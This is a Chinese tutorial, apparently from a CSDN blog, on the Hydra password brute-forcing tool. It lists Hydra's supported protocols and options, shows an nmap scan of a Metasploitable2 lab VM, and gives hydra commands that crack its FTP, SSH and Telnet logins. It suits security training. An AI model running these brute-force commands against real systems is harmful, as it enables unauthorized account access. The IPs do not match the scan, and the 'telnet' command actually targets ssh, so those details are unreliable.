Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限。

目前该工具支持以下协议的爆破:
AFP,Cisco AAA,Cisco身份验证,Cisco启用,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP-PROXY,HTTPS-FORM- GET,HTTPS-FORM-POST,HTTPS-GET,HTTPS-HEAD,HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle Listener,Oracle SID,Oracle,PC-Anywhere, PCNFS,POP3,POSTGRES,RDP,Rexec,Rlogin,Rsh,SAP / R3,SIP,SMB,SMTP,SMTP枚举,SNMP,SOCKS5,SSH(v1和v2),Subversion,Teamspeak(TS2),Telnet,VMware-Auth ,VNC和XMPP。

对于 HTTP,POP3,IMAP和SMTP,支持几种登录机制,如普通和MD5摘要等。

Hydra暴力破解工具的用法_byc6352的专栏-CSDN博客

hydra常见参数-R:继续从上一次进度接着破解-S:大写,采用SSL链接-s  <PORT>:小写,可通过这个参数指定非默认端口-l  <LOGIN>:指定破解的用户,对特定用户破解-L  <FILE>:指定用户名字典-p  <PASS>:小写,指定密码破解,少用,一般是采用密码字典-P  <FILE>:大写,指定密码字典-e  <ns>:可选选项,n:空密码试探,s:使用指定用户和密码试探-C  <FILE>:使用冒号分割格式,例如“登录名:密码”来代替 -L/-P 参数-M  <FILE>:指定目标列表文件一行一条-o  <FILE>:指定结果输出文件-f :在使用-M参数以后,找到第一对登录名或者密码的时候中止破解-t <TASKS>:同时运行的线程数,默认为16-w <TIME>:设置最大超时的时间,单位秒,默认是30s-v / -V:显示详细过程server:目标ipservice:指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等OPT:可选项

nmap扫描metasploitable2靶机,发现有21,22,23号端口,在这篇文章就以这三端口进行详细实例讲解

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:11 CSTNmap scan report for 192.168.43.46Host is up (0.00032s latency).Not shown: 977 closed portsPORT     STATE SERVICE     VERSION21/tcp   open  ftp         vsftpd 2.3.422/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)23/tcp   open  telnet      Linux telnetd25/tcp   open  smtp        Postfix smtpd53/tcp   open  domain      ISC BIND 9.4.280/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)111/tcp  open  rpcbind     2 (RPC #100000)139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)512/tcp  open  exec        netkit-rsh rexecd513/tcp  open  login       OpenBSD or Solaris rlogind514/tcp  open  tcpwrapped1099/tcp open  java-rmi    GNU Classpath grmiregistry1524/tcp open  bindshell   Metasploitable root shell2049/tcp open  nfs         2-4 (RPC #100003)2121/tcp open  ftp         ProFTPD 1.3.13306/tcp open  mysql       MySQL 5.0.51a-3ubuntu55432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.75900/tcp open  vnc         VNC (protocol 3.3)6000/tcp open  X11         (access denied)6667/tcp open  irc         UnrealIRCd8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

通过下列代码爆破出ftp登录名和密码为msfadmin

hydra -L username.txt -P password.txt 192.168.1.1 ftp

通过下列代码爆破出ssh登录名和密码为msfadmin

hydra -l msfadmin -p msfadmin 192.168.1.1 ssh  

通过下列代码爆破出telnet登录名和密码为msfadmin

hydra -l msfadmin -p msfadmin 192.168.1.1 ssh